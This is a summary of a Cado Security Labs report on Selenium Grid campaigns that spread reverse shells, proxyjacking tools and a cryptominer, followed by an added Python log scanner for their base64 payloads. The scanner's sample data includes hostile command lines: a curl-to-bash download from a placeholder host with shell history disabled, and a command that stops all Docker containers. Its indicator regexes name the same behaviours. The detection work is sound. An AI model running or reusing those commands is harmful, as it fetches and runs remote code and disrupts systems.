Cado Security Labs discovered two campaigns exploiting misconfigured Selenium Grid instances to deploy malware, including an exploit kit, a cryptominer, and a proxyjacker. Selenium Grid is widely used for browser automation and testing, but its default configuration has no authentication, so any instance reachable over the network will accept session requests from anyone. Both campaigns delivered base64-encoded scripts that executed malicious payloads such as the GSocket reverse shell, IPRoyal proxyjacking software, and cryptomining malware.
The first campaign exploited the lack of authentication in Selenium Grid to inject a base64-encoded Python script. The script executed a payload that set the HISTFILE variable to disable shell command history logging, downloaded and executed a reverse shell script, and installed a second script named "pl." This script performed system checks, stopped Docker containers, installed proxyjacking tools like IPRoyal Pawns, and set up the environment for further exploitation. It also included a base64-encoded script to install Docker if not already running and retrieved Traffmonetizer and WatchTower Docker images.
The second campaign also used base64-encoded scripts for its malicious activity. Decoding the Python script revealed a bash script that checked the system's architecture, then downloaded and executed a UPX-packed ELF binary. The binary used the PwnKit exploit to escalate privileges, connected to Tor nodes for command and control, and deployed a cryptominer together with an ELF binary named "top" that had been built with the Shell Script Compiler (SHC). The campaign relied on techniques such as UPX packing to evade detection, and it established persistence using cron jobs.
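Both campaigns share one detectable trait: the command injected through the unauthenticated Grid endpoint is a base64 blob that decodes to a script, sometimes with a second base64 layer inside it. The following Python scanner is an added example, not tooling from Cado Security Labs or the Selenium project: it pulls base64 candidates out of captured session-request lines, decodes them (one level of nesting included), and flags the behaviours the report describes, namely disabling shell history via HISTFILE, piping a download into a shell, stopping Docker containers, and pulling a Traffmonetizer image. The log line format, the indicator regexes, and the sample payloads (with placeholder hosts and image names) are all assumptions constructed for the example.

```python
"""Scan captured Selenium Grid session-request lines for base64-encoded command
payloads and flag behaviours described in the Cado report. Added example; the
log format and indicator list are assumptions, not the report's own tooling."""
import base64
import binascii
import re
from typing import Dict, List, Optional

# Candidate base64 token: long enough to skip ordinary words, optional padding.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")

# Behaviours named in the report, expressed as regexes over the decoded script text.
INDICATORS: Dict[str, re.Pattern] = {
    "history_disabled": re.compile(r"(unset\s+HISTFILE|HISTFILE=(/dev/null|['\"]{2}))"),
    "download_and_execute": re.compile(r"(curl|wget)[^\n|;]*\|\s*(ba)?sh\b"),
    "docker_tampering": re.compile(r"docker\s+(stop|kill|rm)\b"),
    "proxyjacking_image": re.compile(r"docker\s+(pull|run)[^\n]*traffmonetizer", re.I),
}


def decode_blob(blob: str) -> Optional[str]:
    """Decode a candidate blob; return None unless it is valid base64 of readable text."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    # Random base64-looking tokens (session ids, hashes) rarely decode to printable text.
    printable = sum(ch.isprintable() or ch in "\n\t" for ch in text)
    if printable < 0.9 * len(text):
        return None
    return text


def scan_line(line: str) -> List[str]:
    """Return sorted indicator names matched by any decoded payload in the line."""
    hits = set()
    for match in B64_BLOB.finditer(line):
        decoded = decode_blob(match.group(0))
        if decoded is None:
            continue
        # The report describes base64 inside base64 (Python wrapper around a bash
        # script), so look one level deeper as well.
        candidates = [decoded]
        for inner in B64_BLOB.finditer(decoded):
            inner_text = decode_blob(inner.group(0))
            if inner_text:
                candidates.append(inner_text)
        for text in candidates:
            for name, pattern in INDICATORS.items():
                if pattern.search(text):
                    hits.add(name)
    return sorted(hits)


def scan_log(lines: List[str]) -> Dict[int, List[str]]:
    """Map 1-based line number to matched indicators for lines that raise any hit."""
    return {i: hits for i, line in enumerate(lines, 1) if (hits := scan_line(line))}


def _b64(text: str) -> str:
    return base64.b64encode(text.encode()).decode()


# Constructed sample payloads (not real captures); hosts and images are placeholders.
_PAYLOAD_1 = "export HISTFILE=/dev/null; curl -s http://EXAMPLE-PLACEHOLDER/pl | bash"
_INNER_BASH = "docker stop $(docker ps -q); docker pull traffmonetizer/PLACEHOLDER"
# Python wrapper carrying a second base64 layer, as in the second campaign.
_OUTER = "import base64,os;os.system(base64.b64decode('" + _b64(_INNER_BASH) + "').decode())"

# Constructed session-request lines: one benign, two carrying encoded commands.
SAMPLE_LOG = [
    "POST /session caps=browserName=chrome;platformName=linux status=200",
    "POST /session caps=browserName=chrome;args=python3 -c \"exec(base64.b64decode('"
    + _b64(_PAYLOAD_1) + "'))\" status=500",
    "POST /session caps=browserName=chrome;args=python3 -c \"exec(base64.b64decode('"
    + _b64(_OUTER) + "'))\" status=500",
]

if __name__ == "__main__":
    for lineno, found in scan_log(SAMPLE_LOG).items():
        print(f"line {lineno}: {', '.join(found)}")
```

The printable-ratio check in `decode_blob` is what keeps session identifiers and similar tokens from producing noise; if a Grid deployment logs long hex or UUID fields, tighten the minimum blob length or restrict scanning to the capabilities field rather than the whole line.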